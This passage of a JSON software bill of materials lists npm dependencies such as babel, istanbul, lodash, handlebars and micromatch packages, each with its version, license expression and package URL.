expression":"MIT"}],"purl":"pkg:npm/p-locate@2.0.0"},{"bom-ref":"419-p-limit@1.2.0","type":"library","name":"p-limit","version":"1.2.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/p-limit@1.2.0"},{"bom-ref":"420-p-try@1.0.0","type":"library","name":"p-try","version":"1.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/p-try@1.0.0"},{"bom-ref":"421-path-exists@3.0.0","type":"library","name":"path-exists","version":"3.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/path-exists@3.0.0"},{"bom-ref":"422-glob@7.1.2","type":"library","name":"glob","version":"7.1.2","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/glob@7.1.2"},{"bom-ref":"423-istanbul-lib-coverage@1.2.0","type":"library","name":"istanbul-lib-coverage","version":"1.2.0","licenses":[{"expression":"BSD-3-Clause"}],"purl":"pkg:npm/istanbul-lib-coverage@1.2.0"},{"bom-ref":"424-istanbul-lib-hook@1.1.0","type":"library","name":"istanbul-lib-hook","version":"1.1.0","licenses":[{"expression":"BSD-3-Clause"}],"purl":"pkg:npm/istanbul-lib-hook@1.1.0"},{"bom-ref":"425-append-transform@0.4.0","type":"library","name":"append-transform","version":"0.4.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/append-transform@0.4.0"},{"bom-ref":"426-istanbul-lib-instrument@1.10.1","type":"library","name":"istanbul-lib-instrument","version":"1.10.1","licenses":[{"expression":"BSD-3-Clause"}],"purl":"pkg:npm/istanbul-lib-instrument@1.10.1"},{"bom-ref":"427-babel-generator@6.26.1","type":"library","name":"babel-generator","version":"6.26.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/babel-generator@6.26.1"},{"bom-ref":"428-babel-messages@6.23.0","type":"library","name":"babel-messages","version":"6.23.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/babel-messages@6.23.0"},{"bom-ref":"429-babel-runtime@6.26.0","type":"library","name":"babel-runtime","version":"6.26.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/babel-runtime@6.26.0"},{"bom-ref":"430-core-js@2.5.6","type":"library","name":"core-js","version":"2.5.6","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/core-js@2.5.6"},{"bom-ref":"431-regenerator-runtime@0.11.1","type":"library","name":"regenerator-runtime","version":"0.11.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/regenerator-runtime@0.11.1"},{"bom-ref":"432-babel-types@6.26.0","type":"library","name":"babel-types","version":"6.26.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/babel-types@6.26.0"},{"bom-ref":"433-esutils@2.0.2","type":"library","name":"esutils","version":"2.0.2","licenses":[{"expression":"BSD-2-Clause"}],"purl":"pkg:npm/esutils@2.0.2"},{"bom-ref":"434-lodash@4.17.10","type":"library","name":"lodash","version":"4.17.10","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/lodash@4.17.10"},{"bom-ref":"435-to-fast-properties@1.0.3","type":"library","name":"to-fast-properties","version":"1.0.3","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/to-fast-properties@1.0.3"},{"bom-ref":"436-detect-indent@4.0.0","type":"library","name":"detect-indent","version":"4.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/detect-indent@4.0.0"},{"bom-ref":"437-repeating@2.0.1","type":"library","name":"repeating","version":"2.0.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/repeating@2.0.1"},{"bom-ref":"438-is-finite@1.0.2","type":"library","name":"is-finite","version":"1.0.2","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/is-finite@1.0.2"},{"bom-ref":"439-number-is-nan@1.0.1","type":"library","name":"number-is-nan","version":"1.0.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/number-is-nan@1.0.1"},{"bom-ref":"440-jsesc@1.3.0","type":"library","name":"jsesc","version":"1.3.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/jsesc@1.3.0"},{"bom-ref":"441-source-map@0.5.7","type":"library","name":"source-map","version":"0.5.7","licenses":[{"expression":"BSD-3-Clause"}],"purl":"pkg:npm/source-map@0.5.7"},{"bom-ref":"442-trim-right@1.0.1","type":"library","name":"trim-right","version":"1.0.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/trim-right@1.0.1"},{"bom-ref":"443-babel-template@6.26.0","type":"library","name":"babel-template","version":"6.26.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/babel-template@6.26.0"},{"bom-ref":"444-babel-traverse@6.26.0","type":"library","name":"babel-traverse","version":"6.26.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/babel-traverse@6.26.0"},{"bom-ref":"445-babel-code-frame@6.26.0","type":"library","name":"babel-code-frame","version":"6.26.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/babel-code-frame@6.26.0"},{"bom-ref":"446-chalk@1.1.3","type":"library","name":"chalk","version":"1.1.3","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/chalk@1.1.3"},{"bom-ref":"447-ansi-styles@2.2.1","type":"library","name":"ansi-styles","version":"2.2.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/ansi-styles@2.2.1"},{"bom-ref":"448-escape-string-regexp@1.0.5","type":"library","name":"escape-string-regexp","version":"1.0.5","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/escape-string-regexp@1.0.5"},{"bom-ref":"449-has-ansi@2.0.0","type":"library","name":"has-ansi","version":"2.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/has-ansi@2.0.0"},{"bom-ref":"450-ansi-regex@2.1.1","type":"library","name":"ansi-regex","version":"2.1.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/ansi-regex@2.1.1"},{"bom-ref":"451-strip-ansi@3.0.1","type":"library","name":"strip-ansi","version":"3.0.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/strip-ansi@3.0.1"},{"bom-ref":"452-supports-color@2.0.0","type":"library","name":"supports-color","version":"2.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/supports-color@2.0.0"},{"bom-ref":"453-js-tokens@3.0.2","type":"library","name":"js-tokens","version":"3.0.2","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/js-tokens@3.0.2"},{"bom-ref":"454-babylon@6.18.0","type":"library","name":"babylon","version":"6.18.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/babylon@6.18.0"},{"bom-ref":"455-globals@9.18.0","type":"library","name":"globals","version":"9.18.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/globals@9.18.0"},{"bom-ref":"456-invariant@2.2.4","type":"library","name":"invariant","version":"2.2.4","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/invariant@2.2.4"},{"bom-ref":"457-loose-envify@1.3.1","type":"library","name":"loose-envify","version":"1.3.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/loose-envify@1.3.1"},{"bom-ref":"458-semver@5.5.0","type":"library","name":"semver","version":"5.5.0","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/semver@5.5.0"},{"bom-ref":"459-istanbul-lib-report@1.1.3","type":"library","name":"istanbul-lib-report","version":"1.1.3","licenses":[{"expression":"BSD-3-Clause"}],"purl":"pkg:npm/istanbul-lib-report@1.1.3"},{"bom-ref":"460-path-parse@1.0.5","type":"library","name":"path-parse","version":"1.0.5","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/path-parse@1.0.5"},{"bom-ref":"461-supports-color@3.2.3","type":"library","name":"supports-color","version":"3.2.3","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/supports-color@3.2.3"},{"bom-ref":"462-has-flag@1.0.0","type":"library","name":"has-flag","version":"1.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/has-flag@1.0.0"},{"bom-ref":"463-istanbul-lib-source-maps@1.2.3","type":"library","name":"istanbul-lib-source-maps","version":"1.2.3","licenses":[{"expression":"BSD-3-Clause"}],"purl":"pkg:npm/istanbul-lib-source-maps@1.2.3"},{"bom-ref":"464-rimraf@2.6.2","type":"library","name":"rimraf","version":"2.6.2","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/rimraf@2.6.2"},{"bom-ref":"465-istanbul-reports@1.4.0","type":"library","name":"istanbul-reports","version":"1.4.0","licenses":[{"expression":"BSD-3-Clause"}],"purl":"pkg:npm/istanbul-reports@1.4.0"},{"bom-ref":"466-handlebars@4.0.11","type":"library","name":"handlebars","version":"4.0.11","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/handlebars@4.0.11"},{"bom-ref":"467-async@1.5.2","type":"library","name":"async","version":"1.5.2","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/async@1.5.2"},{"bom-ref":"468-source-map@0.4.4","type":"library","name":"source-map","version":"0.4.4","licenses":[{"expression":"BSD-3-Clause"}],"purl":"pkg:npm/source-map@0.4.4"},{"bom-ref":"469-amdefine@1.0.1","type":"library","name":"amdefine","version":"1.0.1","licenses":[{"expression":"(BSD-3-Clause OR MIT)"}],"purl":"pkg:npm/amdefine@1.0.1"},{"bom-ref":"470-uglify-js@2.8.29","type":"library","name":"uglify-js","version":"2.8.29","licenses":[{"expression":"BSD-2-Clause"}],"purl":"pkg:npm/uglify-js@2.8.29"},{"bom-ref":"471-yargs@3.10.0","type":"library","name":"yargs","version":"3.10.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/yargs@3.10.0"},{"bom-ref":"472-camelcase@1.2.1","type":"library","name":"camelcase","version":"1.2.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/camelcase@1.2.1"},{"bom-ref":"473-cliui@2.1.0","type":"library","name":"cliui","version":"2.1.0","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/cliui@2.1.0"},{"bom-ref":"474-center-align@0.1.3","type":"library","name":"center-align","version":"0.1.3","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/center-align@0.1.3"},{"bom-ref":"475-align-text@0.1.4","type":"library","name":"align-text","version":"0.1.4","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/align-text@0.1.4"},{"bom-ref":"476-kind-of@3.2.2","type":"library","name":"kind-of","version":"3.2.2","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/kind-of@3.2.2"},{"bom-ref":"477-is-buffer@1.1.6","type":"library","name":"is-buffer","version":"1.1.6","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/is-buffer@1.1.6"},{"bom-ref":"478-longest@1.0.1","type":"library","name":"longest","version":"1.0.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/longest@1.0.1"},{"bom-ref":"479-repeat-string@1.6.1","type":"library","name":"repeat-string","version":"1.6.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/repeat-string@1.6.1"},{"bom-ref":"480-lazy-cache@1.0.4","type":"library","name":"lazy-cache","version":"1.0.4","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/lazy-cache@1.0.4"},{"bom-ref":"481-right-align@0.1.3","type":"library","name":"right-align","version":"0.1.3","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/right-align@0.1.3"},{"bom-ref":"482-wordwrap@0.0.2","type":"library","name":"wordwrap","version":"0.0.2","licenses":[{"expression":"(MIT OR X11)"}],"purl":"pkg:npm/wordwrap@0.0.2"},{"bom-ref":"483-decamelize@1.2.0","type":"library","name":"decamelize","version":"1.2.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/decamelize@1.2.0"},{"bom-ref":"484-window-size@0.1.0","type":"library","name":"window-size","version":"0.1.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/window-size@0.1.0"},{"bom-ref":"485-uglify-to-browserify@1.0.2","type":"library","name":"uglify-to-browserify","version":"1.0.2","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/uglify-to-browserify@1.0.2"},{"bom-ref":"486-merge-source-map@1.1.0","type":"library","name":"merge-source-map","version":"1.1.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/merge-source-map@1.1.0"},{"bom-ref":"487-micromatch@3.1.10","type":"library","name":"micromatch","version":"3.1.10","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/micromatch@3.1.10"},{"bom-ref":"488-arr-diff@4.0.0","type":"library","name":"arr-diff","version":"4.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/arr-diff@4.0.0"},{"bom-ref":"489-array-unique@0.3.2","type":"library","name":"array-unique","version":"0.3.2","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/array-unique@0.3.2"},{"bom-ref":"490-braces@2.3.2","type":"library","name":"braces","version":"2.3.2","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/braces@2.3.2"},{"bom-ref":"491-arr-flatten@1.1.0","type":"library","name":"arr-flatten","version":"1.1.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/arr-flatten@1.1.0"},{"bom-ref":"492-extend-shallow@2.0.1","type":"library","name":"extend-shallow","version":"2.0.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/extend-shallow@2.0.1"},{"bom-ref":"493-is-extendable@0.1.1","type":"library","name":"is-extendable","version":"0.1.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/is-extendable@0.1.1"},{"bom-ref":"494-fill-range@4.0.0","type":"library","name":"fill-range","version":"4.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/fill-range@4.0.0"},{"bom-ref":"495-is-number@3.0.0","type":"library","name":"is-number","version":"3.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/is-number@3.0.0"},{"bom-ref":"496-to-regex-range@2.1.1","type":"library","name":"to-regex-range","version":"2.1.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/to-regex-range@2.1.1"},{"bom-ref":"497-isobject@3.0.1","type":"library","name":"isobject","version":"3.0.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/isobject@3.0.1"},{"bom-ref":"498-repeat-element@1.1.2","type":"library","name":"repeat-element","version":"1.1.2","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/repeat-element@1.1.2"},{"bom-ref":"499-snapdragon@0.8.2","type":"library","name":"snapdragon","version":"0.8.2","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/snapdragon@0.8.2"},{"bom-ref":"500-base@0.11.2","type":"library","name":"base","version":"0.11.2","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/base@0.11.2"},{"bom-ref":"501-cache-base@1.0.1","type":"library","name":"cache-base","version":"1.0.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/cache-base@1.0.1"},{"bom-ref":"502-collection-visit@1.0.0","type":"library","name":"collection-visit","version":"1.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/collection-visit@1.0.0"},{"bom-ref":"503-map-visit@1.0.0","type":"library","name":"map-visit","version":"1.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/map-visit@1.0.0"},{"bom-ref":"504-object-visit@1.0.1","type":"library","name":"object-visit","version":"1.0.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/object-visit@1.0.1"},{"bom-ref":"505-component-emitter@1.2.1","type":"library","name":"component-emitter","version":"1.2.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/component-emitter@1.2.1"},{"bom-ref":"506-get-value@2.0.6","type":"library","name":"get-value","version":"2.0.6","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/get-value@2.0.6"},{"bom-ref":"507-has-value@1.0.0","type":"library","name":"has-value","version":"1.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/has-value@1.0.0"},{"bom-ref":"508-has-values@1.0.0","type":"library","name":"has-values","version":"1.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/has-values@1.0.0"},{"bom-ref":"509-kind-of@4.0.0","type":"library","name":"kind-of","version":"4.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/kind-of@4.0.0"},{"bom-ref":"510-set-value@2.0.0","type":"library","name":"set-value","version":"2.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/set-value@2.0.0"},{"bom-ref":"511-is-plain-object@2.0.4","type":"library","name":"is-plain-object","version":"2.0.4","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/is-plain-object@2.0.4"},{"bom-ref":"512-split-string@3.1.0","type":"library","name":"split-string","version":"3.1.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/split-string@3.1.0"},{"bom-ref":"513-extend-shallow@3.0.2","type":"library","name":"extend-shallow","version":"3.0.2","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/extend-shallow@3.0.2"},{"bom-ref":"514-assign-symbols@1.0.0","type":"library","name":"assign-symbols","version":"1.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/assign-symbols@1.0.0"},{"bom-ref":"515-is-extendable@1.0.1","type":"library","name":"is-extendable","version":"1.0.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/is-extendable@1.0.1"},{"bom-ref":"516-to-object-path@0.3.0","type":"library","name":"to-object-path","version":"0.3.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/to-object-path@0.3.0"},{"bom-ref":"517-union-value@1.0.0","type":"library","name":"union-value","version":"1.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/union-value@1.0.0"},{"bom-ref":"518-arr-union@3.1.0","type":"library","name":"arr-union","version":"3.1.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/arr-union@3.1.0"},{"bom-ref":"519-set-value@0.4.3","type":"library","name":"set-value","version":"0.4.3","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/set-value@0.4.3"},{"bom-ref":"520-unset-value@1.0.0","type":"library","name":"unset-value","version":"1.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/unset-value@1.0.0"},{"bom-ref":"521-has-value@0.3.1","type":"library","name":"has-value","version":"0.3.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/has-value@0.3.1"},{"bom-ref":"522-has-values@0.1.4","type":"library","name":"has-values","version":"0.1.4","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/has-values@0.1.4"},{"bom-ref":"523-isobject@2.1.0","type":"library","name":"isobject","version":"2.1.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/isobject@2.1.0"},{"bom-ref":"524-class-utils@0.3.6","type":"library","name":"class-utils","version":"0.3.6","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/class-utils@0.3.6"},{"bom-ref":"525-define-property@0.2.5","type":"library","name":"define-property","version":"0.2.5","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/define-property@0.2.5"},{"bom-ref":"526-is-descriptor@0.1.6","type":"library","name":"is-descriptor","version":"0.1.6","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/is-descriptor@0.1.6"},{"bom-ref":"527-is-accessor-descriptor@0.1.6","type":"library","name":"is-accessor-descriptor","version":"0.1.6","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/is-accessor-descriptor@0.1.6"},{"bom-ref":"528-is-data-descriptor@0.1.4","type":"library","name":"is-data-descriptor","version":"0.1.4","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/is-data-descriptor@0.1.4"},{"bom-ref":"529-kind-of@5.1.0","type":"library","name":"kind-of","version":"5.1.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/kind-of@5.1.0"},{"bom-ref":"530-static-extend@0.1.2","type":"library","name":"static-extend","version":"0.1.2","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/static-extend@0.1.2"},{"bom-ref":"531-object-copy@0.1.0","type":"library","name":"object-copy","version":"0.1.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/object-copy@0.1.0"},{"bom-ref":"532-copy-descriptor@0.1.1","type":"library","name":"copy-descriptor","version":"0.1.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/copy-descriptor@0.1.1"},{"bom-ref":"533-define-property@1.0.0","type":"library","name":"define-property","version":"1.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/define-property@1.0.0"},{"bom-ref":"534-is-descriptor@1.0.2","type":"library","name":"is-descriptor","version":"1.0.2","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/is-descriptor@1.0.2"},{"bom-ref":"535-is-accessor-descriptor@1.0.0","type":"library","name":"is-accessor-descriptor","version":"1.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/is-accessor-descriptor@1.0.0"},{"bom-ref":"536-kind-of@6.0.2","type":"library","name":"kind-of","version":"6.0.2","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/kind-of@6.0.2"},{"bom-ref":"537-is-data-descriptor@1.0.0","type":"library","name":"is-data-descriptor","version":"1.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/is-data-descriptor@1.0.0"},{"bom-ref":"538-mixin-deep@1.3.1","type":"library","name":"mixin-deep","version":"1.3.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/mixin-deep@1.3.1"},{"bom-ref":"539-for-in@1.0.2","type":"library","name":"for-in","version":"1.0.2","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/for-in@1.0.2"},{"bom-ref":"540-pascalcase@0.1.1","type":"library","name":"pascalcase","version":"0.1.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/pascalcase@0.1.1"},{"bom-ref":"541-map-cache@0.2.2","type":"library","name":"map-cache","version":"0.2.2","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/map-cache@0.2.2"},{"bom-ref":"542-source-map-resolve@0.5.1","type":"library","name":"source-map-resolve","version":"0.5.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/source-map-resolve@0.5.1"},{"bom-ref":"543-atob@2.1.1","type":"library","name":"atob","version":"2.1.1","licenses":[{"expression":"(MIT OR Apache-2.0)"}],"purl":"pkg:npm/atob@2.1.1"},{"bom-ref":"544-decode-uri-component@0.2.0","type":"library","name":"decode-uri-component","version":"0.2.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/decode-uri-component@0.2.0"},{"bom-ref":"545-resolve-url@0.2.1","type":"library","name":"resolve-url","version":"0.2.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/resolve-url@0.2.1"},{"bom-ref":"546-source-map-url@0.4.0","type":"library","name":"source-map-url","version":"0.4.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/source-map-url@0.4.0"},{"bom-ref":"547-urix@0.1.0","type":"library","name":"urix","version":"0.1.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/urix@0.1.0"},{"bom-ref":"548-use@3.1.0","type":"library","name":"use","version":"3.1.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/use@3.1.0"},{"bom-ref":"549-snapdragon-node@2.1.1","type":"library","name":"snapdragon-node","version":"2.1.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/snapdragon-node@2.1.1"},{"bom-ref":"550-snapdragon-util@3.0.1","type":"library","name":"snapdragon-util","version":"3.0.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/snapdragon-util@3.0.1"},{"bom-ref":"551-to-regex@3.0.2","type":"library","name":"to-regex","version":"3.0.2","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/to-regex@3.0.2"},{"bom-ref":"552-define-property@2.0.2","type":"library","name":"define-property","version":"2.0.2","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/define-property@2.0.2"},{"bom-ref":"553-regex-not@1.0.2","type":"library","name":"regex-not","version":"1.0.2","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/regex-not@1.0.2"},{"bom-ref":"554-safe-regex@1.1.0","type":"library","name":"safe-regex","version":"1.1.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/safe-regex@1.1.0"},{"bom-ref":"555-ret@0.1.15","type":"library","name":"ret","version":"0.1.15","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/ret@0.1.15"},{"bom-ref":"556-extglob@2.0.4","type":"library","name":"extglob","version":"2.0.4","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/extglob@2.0.4"},{"bom-ref":"557-expand-brackets@2.1.4","type":"library","name":"expand-brackets","version":"2.1.4","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/expand-brackets@2.1.4"},{"bom-ref":"558-posix-character-classes@0.1.1","type":"library","name":"posix-character-classes","version":"0.1.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/posix-character-classes@0.1.1"},{"bom-ref":"559-fragment-cache@0.2.1","type":"library","name":"fragment-cache","version":"0.2.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/fragment-cache@0.2.1"},{"bom-ref":"560-nanomatch@1.2.9","type":"library","name":"nanomatch","version":"1.2.9","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/nanomatch@1.2.9"},{"bom-ref":"561-is-odd@2.0.0","type":"library","name":"is-odd","version":"2.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/is-odd@2.0.0"},{"bom-ref":"562-is-number@4.0.0","type":"library","name":"is-number","version":"4.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/is-number@4.0.0"},{"bom-ref":"563-is-windows@1.0.2","type":"library","name":"is-windows","version":"1.0.2","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/is-windows@1.0.2"},{"bom-ref":"564-object.pick@1.3.0","type":"library","name":"object.pick","version":"1.3.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/object.pick@1.3.0"},{"bom-ref":"565-spawn-wrap@1.4.2","type":"library","name":"spawn-wrap","version":"1.4.2","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/spawn-wrap@1.4.2"},{"bom-ref":"566-os-homedir@1.0.2","type":"library","name":"os-homedir","version":"1.0.2","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/os-homedir@1.0.2"},{"bom-ref":"567-which@1.3.0","type":"library","name":"which","version":"1.3.0","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/which@1.3.0"},{"bom-ref":"568-test-exclude@4.2.1","type":"library","name":"test-exclude","version":"4.2.1","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/test-exclude@4.2.1"},{"bom-ref":"569-read-pkg-up@1.0.1","type":"library","name":"read-pkg-up","version":"1.0.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/read-pkg-up@1.0.1"},{"bom-ref":"570-read-pkg@1.1.0","type":"library","name":"read-pkg","version":"1.1.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/read-pkg@1.1.0"},{"bom-ref":"571-load-json-file@1.1.0","type":"library","name":"load-json-file","version":"1.1.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/load-json-file@1.1.0"},{"bom-ref":"572-parse-json@2.2.0","type":"library","name":"parse-json","version":"2.2.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/parse-json@2.2.0"},{"bom-ref":"573-error-ex@1.3.1","type":"library","name":"error-ex","version":"1.3.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/error-ex@1.3.1"},{"bom-ref":"574-is-arrayish@0.2.1","type":"library","name":"is-arrayish","version":"0.2.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/is-arrayish@0.2.1"},{"bom-ref":"575-pify@2.3.0","type":"library","name":"pify","version":"2.3.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/pify@2.3.0"},{"bom-ref":"576-normalize-package-data@2.4.0","type":"library","name":"normalize-package-data","version":"2.4.0","licenses":[{"expression":"BSD-2-Clause"}],"purl":"pkg:npm/normalize-package-data@2.4.0"},{"bom-ref":"577-hosted-git-info@2.6.0","type":"library","name":"hosted-git-info","version":"2.6.0","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/hosted-git-info@2.6.0"},{"bom-ref":"578-is-builtin-module@1.0.0","type":"library","name":"is-builtin-module","version":"1.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/is-builtin-module@1.0.0"},{"bom-ref":"579-builtin-modules@1.1.1","type":"library","name":"builtin-modules","version":"1.1.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/builtin-modules@1.1.1"},{"bom-ref":"580-validate-npm-package-license@3.0.3","type":"library","name":"validate-npm-package-license","version":"3.0.3","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/validate-npm-package-license@3.0.3"},{"bom-ref":"581-spdx-correct@3.0.0","type":"library","name":"spdx-correct","version":"3.0.0","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/spdx-correct@3.0.0"},{"bom-ref":"582-spdx-expression-parse@3.0.0","type":"library","name":"spdx-expression-parse","version":"3.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/spdx-expression-parse@3.0.0"},{"bom-ref":"583-spdx-exceptions@2.1.0","type":"library","name":"spdx-exceptions","version":"2.1.0","licenses":[{"expression":"CC-BY-3.0"}],"purl":"pkg:npm/spdx-exceptions@2.1.0"},{"bom-ref":"584-spdx-license-ids@3.0.0","type":"library","name":"spdx-license-ids","version":"3.0.0","licenses":[{"expression":"CC0-1.0"}],"purl":"pkg:npm/spdx-license-ids@3.0.0"},{"bom-ref":"585-path-type@1.1.0","type":"library","name":"path-type","version":"1.1.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/path-type@1.1.0"},{"bom-ref":"586-require-main-filename@1.0.1","type":"library","name":"require-main-filename","version":"1.0.1","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/require-main-filename@1.0.1"},{"bom-ref":"587-yargs@11.1.0","type":"library","name":"yargs","version":"11.1.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/yargs@11.1.0"},{"bom-ref":"588-cliui@4.1.0","type":"library","name":"cliui","version":"4.1.0","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/cliui@4.1.0"},{"bom-re